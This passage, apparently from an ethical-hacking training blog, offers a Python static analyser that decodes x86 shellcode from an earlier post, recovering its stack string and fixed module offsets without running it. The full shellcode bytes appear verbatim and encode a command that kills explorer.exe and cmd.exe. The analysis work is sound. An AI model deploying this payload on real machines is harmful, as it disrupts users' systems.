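An added example, not the author's code: a small static analyser in Python that recovers the stack string and the hard-coded offsets from the shellcode above without executing it, which is the check an analyst makes before trusting a blob from a post. It looks for the MOV ECX,imm32 / SUB ECX,EAX / MOV [EDX+disp8],ECX idiom the listing uses and undoes the 0x11111111 arithmetic; the bytes are copied from the post, and the pattern matching is a heuristic tuned to this idiom rather than a general disassembler.

```python
# The post's shellcode, copied verbatim (x86, 32-bit).
SHELLCODE = (
    b"\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x33"
    b"\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11\x11\x11\xB9\x14"
    b"\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5\xB9\x73\x31\x11"
    b"\x11\x2B\xC8\x03\xE9\x8B\xD4\xB9\x10\x21\x11\x11\x2B\xC8\x2B\xD1\xB9"
    b"\x63\x6D\x64\x20\x89\x0A\xB9\x2F\x6B\x20\x74\x89\x4A\x04\xB9"
    b"\x61\x73\x6B\x6B\x89\x4A\x08\xB9\x69\x6C\x6C\x20\x89\x4A\x0C\xB9\x2F"
    b"\x69\x6D\x20\x89\x4A\x10\xB9\x65\x78\x70\x6C\x89\x4A\x14\xB9"
    b"\x6F\x72\x65\x72\x89\x4A\x18\xB9\x2E\x65\x78\x65\x89\x4A\x1C\xB9\x20"
    b"\x2F\x69\x6D\x89\x4A\x20\xB9\x20\x63\x6D\x64\x89\x4A\x24\xB9"
    b"\x2E\x65\x78\x65\x89\x4A\x28\xB9\x31\x40\x77\x11\x2B\xC8\x89\x4A\x2C"
    b"\x33\xDB\x8B\xF4\xB9\x65\x11\x11\x11\x2B\xC8\x8D\x4E\xAC\x51"
    b"\x8D\x4E\xBC\x51\x53\x53\xB9\x31\x13\x11\x11\x2B\xC8\x51\x53\x53\x53"
    b"\x52\x53\xFF\xD5\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C"
    b"\x8B\x76\x1C\x33\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11"
    b"\x11\x11\xB9\x13\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5"
    b"\xB8\x11\x11\x11\x11\xB9\x37\x26\x14\x11\x2B\xC8\x03\xE9\xFF\xD5"
)


def scan(code):
    """Single pass over the bytes. Tracks the last MOV EAX,imm32 (B8) so the
    MOV ECX,imm32 ; SUB ECX,EAX (B9 .. 2B C8) disguise can be undone, then
    classifies what the real ECX value is used for:
      89 0A / 89 4A d8  MOV [EDX(+d8)],ECX        one dword of the stack string
      8B D1 3B DA       MOV EDX,ECX ; CMP EBX,EDX  module index in the PEB list walk
      03 E9             ADD EBP,ECX                hard-coded offset added to that module's base
    Returns (stack_string, [(module_index, offset), ...])."""
    eax, pending_index, offsets, dwords, i = None, None, [], {}, 0
    while i < len(code):
        op = code[i]
        if op == 0xB8 and i + 5 <= len(code):                  # MOV EAX, imm32
            eax = int.from_bytes(code[i + 1:i + 5], "little")
            i += 5
            continue
        if op != 0xB9 or i + 5 > len(code):                    # not MOV ECX, imm32
            i += 1
            continue
        val = int.from_bytes(code[i + 1:i + 5], "little")
        j = i + 5
        if code[j:j + 2] == b"\x2B\xC8" and eax is not None:   # SUB ECX, EAX
            val = (val - eax) & 0xFFFFFFFF
            j += 2
        nxt = code[j:j + 2]
        if nxt == b"\x89\x0A":                                 # MOV [EDX], ECX
            dwords[0] = val
            j += 2
        elif nxt == b"\x89\x4A" and j + 3 <= len(code):        # MOV [EDX+disp8], ECX
            d = code[j + 2]
            dwords[d - 256 if d > 127 else d] = val
            j += 3
        elif nxt == b"\x8B\xD1" and code[j + 2:j + 4] == b"\x3B\xDA":
            pending_index = val
            j += 4
        elif nxt == b"\x03\xE9":                               # ADD EBP, ECX
            offsets.append((pending_index, val))
            j += 2
        i = j
    if not dwords:
        return "", offsets
    base = min(dwords)
    buf = bytearray(max(dwords) - base + 4)
    for d, v in dwords.items():                                # lay the dwords out as they land on the stack
        buf[d - base:d - base + 4] = v.to_bytes(4, "little")
    return bytes(buf).split(b"\x00", 1)[0].decode("latin-1"), offsets


if __name__ == "__main__":
    text, offs = scan(SHELLCODE)
    print("stack string:", text)
    for index, offset in offs:
        print(f"module #{index} in InInitializationOrderModuleList, base + 0x{offset:x}")
```

The recovered command line and the two (module index, offset) pairs are exactly what the listing shows, which is also the evidence that the shellcode is tied to one build: the offsets are added to whatever module happens to be third and second in the loader list, with no export-table lookup to adapt them.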


Cyber Suraksha Abhiyan | Sadik Shaikh © 2015 Sadik Shaikh | CEH V9 | ETHICAL HACKING Course Training Institute in India-Pune
Extreme Hacking Template design by Sadik Shaikh | Cyber Suraksha Abhiyan